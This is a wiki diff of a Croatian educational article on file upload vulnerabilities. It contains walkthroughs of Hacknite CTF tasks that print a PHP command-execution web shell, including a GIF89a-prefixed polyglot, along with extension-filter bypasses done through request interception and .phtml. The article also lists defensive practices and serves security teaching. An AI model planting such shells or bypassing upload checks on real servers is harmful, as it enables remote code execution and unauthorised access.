Differences

This shows you the differences between two versions of the page.

--- file_upload [2023/11/27 16:51] – zrinka
+++ file_upload [2025/12/01 11:40] (current) – external edit 127.0.0.1
@@ Line 1: / Line 1: @@
-**File upload ranjivosti** odnose se na napade koji se izvršavaju postavljanjem (//uploadom//) maliciozne datoteke na poslužitelj. Svaki korisnički unos treba biti pročišćen prije procesiranja. U slučaju kad se prima samo tekst, napadač može pokušati upisati neku malicioznu naredbu i tada se javljaju ranjivosti poput [[sql_injection|SQL injectiona]] ili [[ssti|SSTI-ja]]. Zadaća je sustava da prepozna pokušaj unosa naredbe i da spriječi njezino izvođenje.
+==== File upload ====
-Web aplikacije često dozvoljavaju i prijenos datoteka na poslužitelj (fotografija, dokumenata i slično). U tom slučaju napadač može manipulirati datotekom koju prenosi na poslužitelj i napraviti štetu. Najjednostavniji je slučaj u aplikacijama koje nemaju popis dozvoljenih ekstenzija, već prihvaćaju datoteke svih formata. Tada je moguće jednostavno objaviti .php, .py ili bilo koju datoteku koja se može izvršiti kao programski kôd. Uspješan prijenos takve datoteke nije uvijek dovoljan da bi se kôd izvršio, već je potrebno i da poslužitelj bude konfiguriran tako da zaista izvede taj kôd.
+**File upload ranjivosti** odnose se na napade koji se izvršavaju postavljanjem (//uploadom//) maliciozne datoteke na poslužitelj. Svaki korisnički unos treba biti pročišćen prije nego što dođe do poslužitelja. U slučaju kad se prima samo tekst, napadač može pokušati upisati neku malicioznu naredbu i tada se javljaju ranjivosti poput [[sql_injection|SQL injectiona]] ili [[ssti|SSTI-ja]]. Zadaća je sustava da prepozna pokušaj unosa naredbe i spriječi njezino izvođenje.
-**__PRIMJER__ - Zadatak s Hacknite platforme - Posluživanje datoteka**
+Kod web aplikacije koje dozvoljavaju prijenos datoteka na poslužitelj (fotografija, dokumenata i slično) napadač može iskoristiti prostor za unos datoteke da pošalje neku malicioznu datoteku na poslužitelj.  Najjednostavniji je slučaj u aplikacijama koje nemaju popis dozvoljenih ekstenzija, već prihvaćaju datoteke svih formata. Tada je moguće jednostavno objaviti .php, .py ili bilo koju datoteku koja se može izvršiti kao programski kôd. Uspješan prijenos takve datoteke nije uvijek dovoljan, već je potrebno i da poslužitelj bude konfiguriran tako da zaista izvede taj kôd.
+\\
+\\
+\\
+**__PRIMJER__ - Zadatak s Hacknite platforme - Posluživanje datoteka**
 <file>
 Ivica je zaključio da je jedna od ključnih vještina koje treba vježbati rad s datotekama kroz web
@@ Line 19: / Line 23: @@
 </file>
+Budući da u zadatku nije navedeno, aplikacija vjerojatno ne provjerava ekstenzije datoteka koje se objavljuju. Pokušajmo za početak objaviti .php datoteku. Napravimo datoteku test.php datoteku s ovim sadržajem:
+<code><?php echo "Hello world!" ?></code>
+Zatim odaberimo u navigaciji "Datoteke" i postavimo svoju datoteku. Postavljanje je uspjelo, dakle ne postoji nikakva provjera formata datoteke. Još treba provjeriti je li se kôd izvršio jer je moguće da poslužitelj ne prepoznaje ekstenziju .php. Po uspješnom postavljanju datoteke, stranica nas obavještava gdje je datoteka postavljena. Ako pratimo tu poveznicu, vidjet ćemo sljedeće:
-Ako aplikacija nema provjeru naziva datoteke koja se postavlja, napadač može objaviti datoteku istog naziva kao neka datoteka kritična za rad sustava i na taj način ju prebrisati. U još ekstremnijem slučaju napadač može u naziv datoteke ubaciti sekvencu za pomicanje po direktorijima (..) i na taj način objaviti datoteke na lokacije kojima ne bi smio imati pristup. Dobra je praksa da sustav sâm dodijeli ime datoteci koja se postavlja. Vrlo je važno imati i provjeru veličine datoteke. Prevelika datoteka može izazvati tzv. //Denial of service// (DoS) napad koji izaziva preopterećenje sustava i onemogućuje njegov rad.
+{{ :file-upload1.png?600 |}}
-Iako gotovo sigurno ne postoji web stranica koja nema validaciju datoteka, često se dogodi da ona ne bude dobro provedena.
+Dakle, kôd se izvršio. Sad napravimo svoju php ljusku koju ćemo postaviti na poslužitelj. Napravit ćemo ju tako da prima podatke preko //cmd// parametra URL-a. Datoteka izgleda ovako:
+<code><?php system($_GET['cmd']); ?></code>
+Nakon što ju postavimo, otiđimo na link i dodajmo //cmd// parametar. Prvo želimo saznati u kojem smo trenutno direktoriju i za to ćemo iskoristiti naredbu **pwd** (//print working directory//):
+<code>[link_datoteke]?cmd=pwd</code>
+Dobili smo ispis **/var/www/html/uploads**. Krenimo s od najvišeg direktorija i izlistajmo njegov sadržaj. Za to ćemo iskoristiti naredbu **ls** (//list//). Dodajmo ovu naredbu u //cmd// parametar:
+<code>ls /var/</code>
+Nismo dobili ništa zanimljivo. Pomaknimo se bliže radnom direktoriju:
+<code> ls /var/www </code>
+Vidimo da postoji nešto što se zove "flag". Pokušajmo to ispisati. Za to ćemo iskoristiti naredbu **cat** (//concatenate//):
+<code>cat /var/www/flag </code>
-Ako sustav ima listu ekstenzija koje smatra opasnima, to nije uvijek dovoljna zaštita jer je uvijek moguće da se neki opasan format zaboravi dodati na listu. Bolja je opcija dozvoliti samo određene formate datoteka i to one koji su ključni za rad aplikacije, a sve ostale zabraniti. Doduše, nije ni to uvijek dovoljno.  Na primjer, ako zabranimo .php datoteke, moguće je da netko pošalje .php5, .pHp datoteku ili čak da datoteka ima dvostruku ekstenziju (datoteka.php.jpg). Nekad je dovoljno nakon ekstenzije dodati točku, razmak ili nešto slično. Također, može se koristiti URL encoding. Datoteka se može nazvati "datoteka%2Ephp". Preglednik će "%2E" interpretirati kao točku, dakle "%2Ephp" će biti ".php". Uobičajena provjera ekstenzije neće ju detektirati jer programi za parsiranje imena datoteke redovito traže prvu pojavu točke i sve nakon nje interpretiraju kao ekstenziju. Program koji parsira ime datoteke neće prepoznati točku, dakle  neće ni pronaći ekstenziju.
+I dobili smo rezultat:
+{{ :file-upload1-rj.png?600 |}}
+\\
+\\
+\\
+Također, ako aplikacija nema provjeru naziva datoteke koja se postavlja, napadač može objaviti datoteku istog naziva kao neka datoteka kritična za rad sustava i na taj način ju prebrisati. U još ekstremnijem slučaju napadač može u naziv datoteke ubaciti sekvencu za pomicanje po direktorijima ("..") i objaviti datoteke na lokacije kojima ne bi smio imati pristup. Zato je dobra praksa da sustav sâm dodijeli ime datoteci koja se postavlja. Vrlo je važno imati i provjeru veličine datoteke. Prevelika datoteka može izazvati tzv. //Denial-of-Service// (DoS) napad koji izaziva preopterećenje sustava i onemogućuje njegov rad.
+Ponekad aplikacije imaju validaciju datoteka, ali ona ne bude dobro provedena. Ako sustav ima listu ekstenzija koje smatra opasnima, to nije uvijek dovoljna zaštita jer je moguće da se neki opasan format zaboravi dodati na listu. Isto tako, moguće je da se ekstenzija modificira tako da ju sustav ne prepozna kao jednu od zabranjenih.  Na primjer, ako zabranimo .php datoteke, moguće je da netko pošalje .php5, .pHp  ili čak dvostruku ekstenziju (datoteka.jpg.php). Nekad je dovoljno nakon ekstenzije dodati točku, razmak ili nešto slično. Bolja je opcija dozvoliti samo one formate koji su ključni za rad aplikacije, a sve ostale zabraniti. Bitno je da se provjera izvršava na poslužiteljskoj strani.
+\\
+\\
+\\
+**__PRIMJER__ - Zadatak s Hacknite platforme - Učitavanje slike.php**
+<file>
+Kako bi naučio lijepo crtati, Mario u slobodno vrijeme precrtava slike prirode. Nažalost, nema puno ideja
+gdje bi našao zanimljive slike, ali je zato napravio stranicu koja mu omogućuje da drugi ljudi učitavaju
+slike koje on onda može iskoristiti. Mario je vrlo oprezan, pa je zato ograničio veličinu datoteka koje se
+mogu učitati kako zlonamjerni ljudi ne bi mogli učitati nešto što nije slika.
+Flag je u formatu CTF2021[brojevi]
+http://chal.platforma.hacknite.hr:10016
+</file>
+Pokušajmo jednostavno postaviti .php datoteku kao u prethodnom zadatku.
+{{ :upload20.png?600 |}}
+Vidimo da nam to ne uspijeva jer dobivamo obavijest da datoteka nije slika. Dakle, sigurni smo da se radi provjera ekstenzije s klijentske (//frontend//) strane. Da bismo zadovoljili tu provjeru, promijenimo ekstenziju datoteke u .jpg. Datoteka se uspješno poslala i dobili smo poveznicu na kojoj se nalazi. Pratimo tu poveznicu i pokušajmo na isti način kao i prije dodati parametar cmd u koji ćemo unijeti neku naredbu (primjerice **pwd**).
+{{ :upload22.png?600 |}}
+Naredba se nije izvršila. Budući da datoteka ima .jpg ekstenziju na kraju, preglednik ju interpretira kao sliku. Dakle, moramo na neki način poslati datoteku koja će zadovoljiti klijentsku provjeru da je u pitanju slika, a koja će se pri dolasku interpretirati kao izvršivi kôd. Najjednostavniji način je da presretnemo zahtjev i promijenimo ekstenziju datoteke. Za to ćemo iskoristiti alat [[burp|Burp Suite]]. Otvorimo alat, uđimo u njegov ugrađeni preglednik i postavimo tamo istu .jpg datoteku. Uključimo //Intercept// i pošaljimo zahtjev.
+{{ :upload23.png?600 |}}
+U ovoj liniji promijenimo .jpg ekstenziju u .php. Sad pošaljimo zahtjev. Nakon ovog koraka možemo isključiti //Intercept//.
+{{ :upload24.png?600 |}}
+Vidimo ovo upozorenje, no ono nam je dobar znak jer to znači da se kôd pokušava izvršiti. //cmd// parametar je prazan, odnosno nije niti zadan, pa se ništa ne može izvršiti. Također, iz poruke o grešci vidimo da se nalazimo na putanji **/var/www/html/uploads**. Krenimo od najvišeg direktorija te putanje i potražimo gdje bi se mogao naći flag. Upišimo u //cmd// parametar:
+<code>ls /var</code>
+Bolja je opcija napisati "ls%20/var", no sustav će sam napraviti URL encoding.
+Dobili smo ispis:\\
+**backups cache important-do-not-touch lib local lock log mail opt run spool tmp www**
+Najzanimljivije nam djeluje **important-do-not-touch** pa ćemo izlistati njegov sadržaj. Napišimo u //cmd// parametar:
+<code>ls /var/important-do-not-touch"</code>
+rezultira s:  **admin-forbidden local**.
+**admin-forbidden** djeluje kao da bi mogao imati nešto zanimljivo u sebi. Izlistajmo i njegov sadržaj:
+<code>cmd=ls /var/important-do-not-touch/admin-forbidden"</code>
+Pojavio se **definitely-not-flag**. Pokušajmo izlistati njegov sadržaj. Dobili smo  neobičan ispis (putanju na kojoj se trenutno dolazimo), dakle u pitanju nije direktorij, već datoteka. Ispišimo njezin sadržaj naredbom
+<code>cat /var/important-do-not-touch/admin-forbidden/definitely-not-flag</code>
+i dobili smo rješenje.
+\\
+\\
+\\
+Kao što sto vidjeli u prethodnom zadatku, nije dovoljno da se provjera formata temelji isključivo na zaglavljima zahtjeva jer se njihove vrijednosti mogu jednostavno promijeniti koristeći neki alat za presretanje zahtjeva. Trebalo bi još utvrditi i da sadržaj datoteke zaista odgovara tom formatu. Na primjer, ako aplikacija prima fotografije, svim bi datotekama prije postavljanja trebalo odrediti neke osobine koje imaju samo fotografije (dimenzija, rezolucija). Ako se pošalje neka skripta, njoj se te osobine ne mogu odrediti, dakle sustav može prepoznati da nije riječ o fotografiji i odbaciti ju. Naravno, važno je da se pritom datoteka ne otvara jer bi to moglo potaknuti izvršavanje kôda.
+\\
+\\
+\\
 **__PRIMJER__ - Zadatak s Hacknite platforme - Posluživanje slika**
 <file>
@@ Line 42: / Line 119: @@
 </file>
-Pokušajmo na isti način objaviti datoteku. Sad primjećujemo razliku jer se .php datoteka ni ne nudi za postavljanje. To znači da stranica provjerava koji se formati objavljuju, dakle moramo nekako sakriti format datoteke. Pokušajmo na kraj dodati .jpg. Sad će se datoteka pojaviti u izboru. Međutim, sustav i dalje ne dozvoljava postavljanje datoteke jer prepoznaje da nije slika.
+Pokušajmo na isti način postaviti datoteku. Napravimo php shell kao i prije:
+<code><?php system($_GET['cmd']); ?></code>
+te ga preimenujmo tako da ima ekstenziju .jpg na kraju. Uključimo //Intercept// na Burpu i postavimo datoteku. Presretnimo zahtjev i promijenimo ekstenziju u .php isto kao u prethodnom zadatku.
-Dakle, sama promjena ekstenzije nije dovoljna, već moramo na još neki način uvjeriti poslužitelj da pokušavamo postaviti fotografiju.
+{{ :upload31.png?600 |}}
-TODO: dodati ostatak
+Vidimo drugačije upozorenje. To je zato što, za razliku od prethodnih slučajeva, sustav radi još jednu provjeru na poslužiteljskoj (//backend//) strani. Dakle, moramo na neki način promijeniti samu datoteku da izgleda kao da je slika. Slike uobičajeno počinju s "GIF89a;" pa ćemo točno to dodati na početak datoteke. Datoteka sad izgleda ovako:
+<code>
+GIF89a;
+<?php system($_GET['cmd']); ?>
+</code>
+Sad ju pošaljimo na poslužitelj i zasad nemojmo mijenjati ekstenziju u zahtjevu.
+{{ :upload32.png?600 |}}
-Problem je i kad se provjera formata temelji isključivo na zaglavljima zahtjeva (primjerice //Content-Type//) koja se mogu jednostavno promijeniti koristeći neki alat za presretanje zahtjeva, primjerice [[burp|Burp Suite]]. Trebalo bi još utvrditi i da sadržaj datoteke zaista odgovara tom formatu. Na primjer, ako aplikacija prima fotografije,svim datotekama bi prije postavljanja trebalo odrediti neke osobine koje imaju samo fotografije (dimenzija, rezolucija). Ako se pošalje neka skripta, njoj se te osobine ne mogu odrediti, dakle sustav može prepoznati da nije riječ o fotografiji i odbaciti ju. Naravno, važno je da se pritom datoteka ne otvara jer bi to moglo potaknuti izvršavanje kôda.
+Datoteka je uspješno postavljena jer zadovoljava klijentsku provjeru, no ne možemo slati nikakve naredbe jer ju sustav interpretira kao fotografiju. Pošaljimo ponovno zahtjev, ali ga presretnimo i promijenimo ekstenziju u .php. Dobivamo identično upozorenje jer sustav prepoznaje neslaganje s formatom datoteke koji se odredi prema početku (GIF89a;), ekstenzijom i zadanim tipom datoteke u //Content-Type// zaglavlju. Zadnje što još trebamo napraviti je iskoristiti neku alternativnu ekstenziju. Uzmimo primjerice **.phtml**.
+Naime, za svaki poslužitelj treba konfigurirati točno koje će ekstenzije kad ih se posjeti izvršiti neki programski kôd, a koje ne. Zato se naša .jpg datoteka neće izvršiti (iako su istog sadržaja kao i kad joj promijenimo ekstenziju u .php ). No, mnogi su poslužitelji konfigurirani tako da .phtml datoteke tretiraju kao .php. Vidjeli smo da je .php zabranjen pa je .phtml dobar kandidat za alternativnu ekstenziju. Budući da .phtml nije ekstenzija za fotografije, moramo poslati .jpg fotografiju, presresti zahtjev i zatim promijeniti ekstenziju u .phtml.
-Budući da je gotovo nemoguće pokriti sve načine na koje se može zaobići validacija datoteke, potrebno je konfigurirati poslužitelj tako da se, ako do njega slučajno dođe izvršivi programski kôd, spriječi njegovo izvršavanje. Dodatna mjera zaštite je onemogućiti postavljanje datoteke prije nego što prođe sve provjere. Neki sustavi koriste odvojeno privremeno spremište (tzv. //sandbox//) u koji stave datoteku i od tamo ju provjeravaju. Nekad je bila praksa postaviti datoteku na poslužitelj i obrisati ju ako se ispostavi da je maliciozna, no pokazano je da je čak nekoliko milisekundi dovoljno da bi se pokrenulo izvršavanje kôda.
+{{ :upload33.png?600 |}}
-**__PRIMJER__ - Zadatak s Hacknite platforme - Učitavanje slike.php**
-(restrikcije na klijentskoj razini)
-<file>
-Kako bi naučio lijepo crtati, Mario u slobodno vrijeme precrtava slike prirode. Nažalost, nema puno ideja
-gdje bi našao zanimljive slike, ali je zato napravio stranicu koja mu omogućuje da drugi ljudi učitavaju
-slike koje on onda može iskoristiti. Mario je vrlo oprezan, pa je zato ograničio veličinu datoteka koje se
-mogu učitati kako zlonamjerni ljudi ne bi mogli učitati nešto što nije slika.
-Flag je u formatu CTF2021[brojevi]
-http://chal.platforma.hacknite.hr:10016
-</file>
+Sad smo dobili uobičajeno upozorenje. Postupak je isti kao i prije te se flag nalazi na putanji **/var/www/flag**. Ispišimo njegovu vrijednost preko //cmd// parametra i dobili smo rješenje.
+\\
+\\
+\\
 ===Izvori===
-[1]https://portswigger.net/web-security/file-upload\\
+[1] https://portswigger.net/web-security/file-upload\\
 [2] https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload\\
+[3] https://platforma.hacknite.hr/\\